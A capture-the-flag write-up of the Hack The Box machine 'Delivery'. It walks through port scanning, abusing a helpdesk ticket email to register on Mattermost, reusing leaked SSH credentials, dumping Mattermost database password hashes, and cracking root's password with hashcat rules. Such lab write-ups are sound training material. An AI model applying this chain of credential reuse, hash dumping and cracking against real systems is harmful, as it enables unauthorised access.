# Delivery - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Delivery was an easy-rated HTB machine created by [ippsec](https://twitter.com/ippsec)

For user, we abuse helpdesk tickets to gain access to an internal email, which can be used to create a mattermost account.  
For root, we brute-force their password with `hashcat` rules.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.10.222
Nmap scan report for 10.10.10.222
Host is up (0.090s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8065/tcp open  unknown
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80,8065 -oN delivery.nmap 10.10.10.222
Nmap scan report for 10.10.10.222
Host is up (0.11s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-title: Welcome
|_http-server-header: nginx/1.14.2
8065/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Wed, 16 Aug 2023 06:03:54 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: yj6fb1zru7b97jdra4iqinep8e
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Wed, 16 Aug 2023 10:05:42 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Wed, 16 Aug 2023 10:05:42 GMT
|_    Content-Length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

Besides the usual SSH (22) and HTTP (80) ports, port 8065 is also exposed.  
Visiting <http://10.10.10.222/> in a browser, we'd get:

![1](images/1.png)

After clicking the "Contact Us" button, some helpful information pops up:

```text
For unregistered users, please use our HelpDesk to get in touch with our team. Once you have an @delivery.htb email address, you'll be able to have access to our MatterMost server.
```

Also, the helpdesk links to <http://helpdesk.delivery.htb/>; we can update `/etc/hosts`:

```text
10.10.10.222 delivery.htb helpdesk.delivery.htb
```

<http://helpdesk.delivery.htb/view.php> is running an `osTicket` instance.

![2](images/2.png)

Default credentials of `ostadmin:Admin1` did not work; neither on `/login.php` nor on `/scp/login.php`

<http://delivery.htb:8065/> is running a MatterMost instance.

![3](images/3.png)

## Creating MatterMost account

We can follow the instructions from "Contact Us" and open a ticket on the helpdesk.  
I created one with the email `opcode@opcode.htb` and this was the response:

```text
opcode, 

You may check the status of your ticket, by navigating to the Check Status page using ticket id: 1786140.

If you want to add more information to your ticket, just email 1786140@delivery.htb.

Thanks,

Support Team
```

Then, I used this email to create an account on mattermost, `opcode:0pc0De####`  
Now, if we visit <http://helpdesk.delivery.htb/view.php> to check ticket status, and enter our information, we'd learn that we've received a verification mail from MatterMost:

```text
---- Registration Successful ---- Please activate your email by going to: http://delivery.htb:8065/do_verify_email?token=4bue53fiqeako6gs8g9uu5bnpanui4asrfzoxc74y7md51ca8zni6nmshg9hirhp&email=1786140%40delivery.htb ) --------------------- You can sign in from: --------------------- Mattermost lets you share messages and files from your PC or phone, with instant search and archiving. For the best experience, download the apps for PC, Mac, iOS and Android from: https://mattermost.com/download/#mattermostApps ( https://mattermost.com/download/#mattermostApps
```

Therefore, we can visit <http://delivery.htb:8065/do_verify_email?token=4bue53fiqeako6gs8g9uu5bnpanui4asrfzoxc74y7md51ca8zni6nmshg9hirhp&email=1786140%40delivery.htb> and verify the email.  
Now, `opcode:0pc0De####` can be used on MatterMost.

In the channel "Internal", there are a couple of messages:

```text
root: @developers Please update theme to the OSTicket before we go live.  Credentials to the server are maildeliverer:Youve_G0t_Mail! 
Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"

root: PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases.
```

`maildeliverer:Youve_G0t_Mail!` works for SSH:

```console
opcode@parrot$ sshpass -p 'Youve_G0t_Mail!' ssh -o StrictHostKeyChecking=no maildeliverer@delivery.htb
```

## Crack password with `hashcat` rules

In `/opt/mattermost/config/config.json`, we can find MatterMost configuration.  
In there, we also have DB credentials: `mmuser:Crack_The_MM_Admin_PW`  
We can use them to connect to MySQL:

```console
maildeliverer@Delivery:~$ mysql --user=mmuser --password=Crack_The_MM_Admin_PW
```

We can select the `mattermost` database and look at the tables:

```console
MariaDB [(none)]> use mattermost;

MariaDB [mattermost]> show tables;
+------------------------+
| Tables_in_mattermost   |
+------------------------+
| Audits                 |
| Bots                   |
| ChannelMemberHistory   |
| ChannelMembers         |
| Channels               |
| ClusterDiscovery       |
| CommandWebhooks        |
| Commands               |
| Compliances            |
| Emoji                  |
| FileInfo               |
| GroupChannels          |
| GroupMembers           |
| GroupTeams             |
| IncomingWebhooks       |
| Jobs                   |
| Licenses               |
| LinkMetadata           |
| OAuthAccessData        |
| OAuthApps              |
| OAuthAuthData          |
| OutgoingWebhooks       |
| PluginKeyValueStore    |
| Posts                  |
| Preferences            |
| ProductNoticeViewState |
| PublicChannels         |
| Reactions              |
| Roles                  |
| Schemes                |
| Sessions               |
| SidebarCategories      |
| SidebarChannels        |
| Status                 |
| Systems                |
| TeamMembers            |
| Teams                  |
| TermsOfService         |
| ThreadMemberships      |
| Threads                |
| Tokens                 |
| UploadSessions         |
| UserAccessTokens       |
| UserGroups             |
| UserTermsOfService     |
| Users                  |
+------------------------+
```

`Users` is always interesting:

```console
MariaDB [mattermost]> select Username,Password from Users;
+----------------------------------+--------------------------------------------------------------+
| Username                         | Password                                                     |
+----------------------------------+--------------------------------------------------------------+
| surveybot                        |                                                              |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| channelexport                    |                                                              |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
| opcode                           | $2a$10$agUGWjkD6IKUmgo2Pa8YXedJ4ofr3d7jrxblTjas.1IYLFcm0QyAK |
+----------------------------------+--------------------------------------------------------------+
```

From the other message on mattermost, we are expected to use `hashcat` rules to crack root's password.  
We can try that:

```console
opcode@parrot$ ./hashcat.bin -m 3200 hash plssub.txt --user -r /usr/share/hashcat/rules/best64.rule
```

It cracks to:

```text
root:PleaseSubscribe!21
```

We can use it for root:

```console
maildeliverer@Delivery:~$ su -
Password: 
root@Delivery:~# id
uid=0(root) gid=0(root) groups=0(root)
```
